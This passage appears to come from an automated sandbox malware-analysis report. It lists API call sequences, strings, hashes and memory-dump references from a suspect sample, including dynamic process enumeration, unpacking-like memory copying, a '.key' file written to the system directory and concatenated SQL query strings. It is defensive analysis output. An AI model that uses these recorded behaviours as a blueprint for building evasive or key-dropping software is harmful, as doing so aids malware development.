                                • Opcode ID: fc09e758745e1273da5ecac6f4eec2e238704063ebec9f0bf6ff596eeb280ddd
                                • Instruction ID: 6aae975a9e54677c1dffbd97719036437efc97821bfcd7a3af5badabb3104436
                                • Opcode Fuzzy Hash: fc09e758745e1273da5ecac6f4eec2e238704063ebec9f0bf6ff596eeb280ddd
                                • Instruction Fuzzy Hash: 28218576A00208BFC710EBA9DC46F9E77BAFB88704F10C565F505DB291DA70EA419B91
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 100072A1
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 100072B5
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 100072BF
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 100072CA
                                • lstrcmpiA.KERNEL32(?,?), ref: 10007308
                                • CloseHandle.KERNEL32(00000000), ref: 10007325
                                • FreeLibrary.KERNEL32(00000000), ref: 10007330
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                • API String ID: 1314729832-4285911020
                                • Opcode ID: 34ed56762a15106232207086527ddfc23317eadf5bed94f0ce2d48dffdfc18be
                                • Instruction ID: add54fd5d1eae8d2497c8c501ea1372363408c8acac21c9162f815250a78b01f
                                • Opcode Fuzzy Hash: 34ed56762a15106232207086527ddfc23317eadf5bed94f0ce2d48dffdfc18be
                                • Instruction Fuzzy Hash: B0115E31901218EBE721DBA58C88BEE7AB8FB89791F044194E9089A240D779DB419AA0
                                APIs
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006D38EF
                                • InterlockedDecrement.KERNEL32(?), ref: 006D395E
                                • SysFreeString.OLEAUT32(00000000), ref: 006D396F
                                • _com_issue_error.COMSUPPD ref: 006D3A0E
                                • InterlockedDecrement.KERNEL32(?), ref: 006D3A1B
                                • SysFreeString.OLEAUT32(00000000), ref: 006D3A2C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Interlocked$DecrementFree$Convert_com_issue_error_com_util::$Increment
                                • String ID: ' And TypeId=$Select * From BaseType Where TypeName='$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 590925477-3993695505
                                • Opcode ID: b767a5431fbb4ed554c70d1bfb1984d5d6981ef8a34f18273ce16ff2befb012f
                                • Instruction ID: 95d190ec037b1d9b04aabfa54555921ae1a083fdeaf9ab425eebdfdd2ed20a11
                                • Opcode Fuzzy Hash: b767a5431fbb4ed554c70d1bfb1984d5d6981ef8a34f18273ce16ff2befb012f
                                • Instruction Fuzzy Hash: 34B13771E40711AFD720DBA8DC02B9AB7B5EF54324F14461EF519A73C1D7B5AA00CBA2
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10004A48
                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 10004AD2
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 10004AE7
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10004AFB
                                • lstrlenA.KERNEL32(00000000), ref: 10004B05
                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 10004B33
                                • WriteFile.KERNEL32(?,00000000,00000000), ref: 10004B3F
                                • CloseHandle.KERNEL32(?), ref: 10004B46
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$lstrlen$CloseCreateDirectoryHandlePointerSizeSystemWrite
                                • String ID: .key$Default
                                • API String ID: 1674266968-1583214558
                                • Opcode ID: c1ba8c6780d5847f181a3eef7d8b380a9f9469f598b10e942cd84e174d25bfbd
                                • Instruction ID: e525a6d1518cc0b384d890bec5d36e1cea57fa62afc329bbf78b3bd04acca3fd
                                • Opcode Fuzzy Hash: c1ba8c6780d5847f181a3eef7d8b380a9f9469f598b10e942cd84e174d25bfbd
                                • Instruction Fuzzy Hash: C1315670600665ABF7118B248C89BDA7BA8EB46342F15C180F9859F291DBB29C45CBE4
                                Strings
                                • pDispParams->cNamedArgs <= pDispParams->cArgs, xrefs: 006FCA62
                                • f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h, xrefs: 006FCA6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\include\atlacc.h$pDispParams->cNamedArgs <= pDispParams->cArgs
                                • API String ID: 0-2904946431
                                • Opcode ID: b0ae2ee8b7341d560819eaa5bdab8c6abf6334c41287c826091c04ca0229a49e
                                • Instruction ID: 0201b81bf9ae90a24d9b909bdba969ecbfe119f3bf617b7d7808623544decb49
                                • Opcode Fuzzy Hash: b0ae2ee8b7341d560819eaa5bdab8c6abf6334c41287c826091c04ca0229a49e
                                • Instruction Fuzzy Hash: D112C3B4A0021DDFCB14CF58D994AADB7B2FF88314F248299E919AB355D734AD82CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ($f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp
                                • API String ID: 0-3676847551
                                • Opcode ID: fda72ba5c30f9bf9a3e6178588c971eb4eddfddf5aee0d477239a12b1a10a246
                                • Instruction ID: 6497957dca26f0345c216e849018a089f3ed8a731056b0940fd79b0eaff44d3b
                                • Opcode Fuzzy Hash: fda72ba5c30f9bf9a3e6178588c971eb4eddfddf5aee0d477239a12b1a10a246
                                • Instruction Fuzzy Hash: 2F12277090125CDBDB24DF98CC59BEEB7B1BB48310F108299E059AB291DB786E89CF51
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10006459
                                • _memmove.LIBCMT ref: 10006470
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 100064B7
                                • _memmove.LIBCMT ref: 100064CE
                                • Sleep.KERNEL32(0000000A), ref: 10006536
                                • Sleep.KERNEL32(00000064), ref: 100065CD
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 100066D6
                                • _memmove.LIBCMT ref: 100066EC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual_memmove$Sleep
                                • String ID: Rsymwe miusskwq
                                • API String ID: 4206171369-1146220206
                                • Opcode ID: b39992e6638efcbd63b561d58da8a2ef33da650ac6194bfc8f6e6eb96a04b218
                                • Instruction ID: 7510a82c7baf54cca25c489c5779c74a11fe2bbea541520675a478c5efd84c51
                                • Opcode Fuzzy Hash: b39992e6638efcbd63b561d58da8a2ef33da650ac6194bfc8f6e6eb96a04b218
                                • Instruction Fuzzy Hash: BEA1383BB8430436F120DA58BC46FBBB758E7D5B66F10426BFF495A1C5D6A2742083A1
                                APIs
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E7E3A
                                • std::_Fac_node::_Fac_node.LIBCPMTD ref: 007E7E5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Fac_nodeFac_node::_std::_
                                • String ID: f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarimages.cpp$lX~
                                • API String ID: 1114552684-3696543366
                                • Opcode ID: c180749bbd00aed6faf6007b41d2d7037c5de1ceeed5139579668e1910a72c66
                                • Instruction ID: 96156e074c44db7b6f30cb2b2d5c68a06188b5ea1b9cc8040287944800b11300
                                • Opcode Fuzzy Hash: c180749bbd00aed6faf6007b41d2d7037c5de1ceeed5139579668e1910a72c66
                                • Instruction Fuzzy Hash: 4BE14A70A00218DFDB68DB55CC95BAAB7B1BF88304F54C1A8E54DAB291DF389D86CF41
                                APIs
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(00911218), ref: 006EE60A
                                • InterlockedDecrement.KERNEL32(00911218), ref: 006EE673
                                • SysFreeString.OLEAUT32(00000000), ref: 006EE684
                                • _com_issue_error.COMSUPPD ref: 006EE714
                                • InterlockedDecrement.KERNEL32(00911218), ref: 006EE721
                                • SysFreeString.OLEAUT32(00000000), ref: 006EE732
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Convert_com_issue_error_com_util::$Interlocked$DecrementFree$IncrementInitialize
                                • String ID: SELECT * FROM Users WHERE UserName='$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2578169450-1792499146
                                • Opcode ID: bdc600cf1e8684fb143c3dca1e3422d8be33cf0a827d70d22e8af4ded651475e
                                • Instruction ID: 0f2525157f02e1ea3296fbe5c2bcfcf33af7d654483d8f3fe4b3790e3da7a34f
                                • Opcode Fuzzy Hash: bdc600cf1e8684fb143c3dca1e3422d8be33cf0a827d70d22e8af4ded651475e
                                • Instruction Fuzzy Hash: 139136719417419BDB20DBA9CC05BAEB3B9EF64324F20461DE915A73C1DB76EA00CBE1
                                APIs
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(00911218), ref: 006DE76A
                                • InterlockedDecrement.KERNEL32(00911218), ref: 006DE7D3
                                • SysFreeString.OLEAUT32(00000000), ref: 006DE7E4
                                • _com_issue_error.COMSUPPD ref: 006DE874
                                • InterlockedDecrement.KERNEL32(00911218), ref: 006DE881
                                • SysFreeString.OLEAUT32(00000000), ref: 006DE892
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Convert_com_issue_error_com_util::$Interlocked$DecrementFree$IncrementInitialize
                                • String ID: SELECT * FROM Medicine WHERE MedName='$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2578169450-2830394671
                                • Opcode ID: e9d103a31be99addc4f78c419d88f50b9e122ce0913f9fedb2ab2407aace1fa9
                                • Instruction ID: 1d8333fd506c27f5ce8ed3d51d01ae409cd40e072f57bf2bbbbf1ad2b688b81c
                                • Opcode Fuzzy Hash: e9d103a31be99addc4f78c419d88f50b9e122ce0913f9fedb2ab2407aace1fa9
                                • Instruction Fuzzy Hash: 4D910771D406019BD720EBA8CC05BAAB3B9EF54724F10465EE925AB3C1DB75EA00CBE1
                                APIs
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(?), ref: 006DA0BA
                                • InterlockedDecrement.KERNEL32(?), ref: 006DA123
                                • SysFreeString.OLEAUT32(00000000), ref: 006DA134
                                • _com_issue_error.COMSUPPD ref: 006DA1C4
                                • InterlockedDecrement.KERNEL32(?), ref: 006DA1D1
                                • SysFreeString.OLEAUT32(00000000), ref: 006DA1E2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Convert_com_issue_error_com_util::$Interlocked$DecrementFree$IncrementInitialize
                                • String ID: SELECT * FROM Items WHERE ItemName='$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 2578169450-2958993396
                                • Opcode ID: ef0610da2aa3c525fb0f59fcffce1d38470df652a51945cd6be8eb1dc3bff21b
                                • Instruction ID: aaf832eb696991999812d1fc0cd1a13b6ac09f0e67a4c3cd8465ec8104c4652b
                                • Opcode Fuzzy Hash: ef0610da2aa3c525fb0f59fcffce1d38470df652a51945cd6be8eb1dc3bff21b
                                • Instruction Fuzzy Hash: 07911471D046019FD720DBA8CC01BAAB3B9EF54324F24461EE925A73C1DB75EA04CBE2
                                APIs
                                • _memset.LIBCMT ref: 007C2333
                                • _memset.LIBCMT ref: 007C23B1
                                • CreateDIBSection.GDI32(00000000,00000000,00000000,007EC8AE,00000000,00000000), ref: 007C241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset$CreateSection
                                • String ID: $(eCompression == 0L) || (eCompression == 3L)$(nBPP == 32) && (eCompression == 0L)$eCompression == 0L$f:\dd\vctools\vc7libs\ship\atlmfc\include\atlimage.h$pdwBitfields != 0
                                • API String ID: 3683608942-1669618004
                                • Opcode ID: 3529a4e0aab58f00687b9225512e6f3099c1b6f96ce9fdddedd1ad7d181f4926
                                • Instruction ID: 1a185bc78dcb19b9917f6f26c89f4990d4830539aeb5dfabe74903d6688799be
                                • Opcode Fuzzy Hash: 3529a4e0aab58f00687b9225512e6f3099c1b6f96ce9fdddedd1ad7d181f4926
                                • Instruction Fuzzy Hash: C6618C74E40208EBDB14DF94CC46FAEB3B1FB58704F50415DE901AB282D7B99E52CB96
                                APIs
                                • GetPropA.USER32(?,AfxOldWndProc423), ref: 006F6A7A
                                • CallWindowProcA.USER32(00000000,?,?,?,00000000), ref: 006F6C17
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • CallWindowProcA.USER32(00000000,?,?,?,00000000), ref: 006F6B3B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: CallMessageProcWindow$PeekPostPropQuit
                                • String ID: $AfxOldWndProc423$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 2230412637-265389337
                                • Opcode ID: d7b4f6b0894491405c04e372521d50e9dcd962981818a483dea26cef035d36f2
                                • Instruction ID: 380b5e058443c4b93e359cab180ac9c0b258db0499d1238fea12327144611c15
                                • Opcode Fuzzy Hash: d7b4f6b0894491405c04e372521d50e9dcd962981818a483dea26cef035d36f2
                                • Instruction Fuzzy Hash: F3512DB690020DAFCB14DFA8D945AFEB7B9FF48300F208519F615A7291D7349A45CBA1
                                APIs
                                  • Part of subcall function 00708830: IsWindow.USER32(?), ref: 00708840
                                  • Part of subcall function 00708830: GetDlgItem.USER32(?,000000FF), ref: 00708886
                                • GetWindowLongA.USER32(?,000000F0), ref: 0070D1FD
                                • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0070D22B
                                • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0070D26F
                                • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 0070D28F
                                • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0070D2D8
                                • GetWindow.USER32(?,00000002), ref: 0070D31C
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 0070D331
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$SendWindow$Long$ItemPeekPostQuit
                                • String ID: Warning: skipping non-radio button in group.$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgdata.cpp
                                • API String ID: 4097183997-1626359077
                                • Opcode ID: 29e5352d7b70bef5ad88fc4732312c84c6e5fd6fbe6967bf66cd17cc68ceed17
                                • Instruction ID: 8c0dbc0ebc1f02a8cfe61033aecb0aac55bc2b28d225a9ca2bebd43b80502767
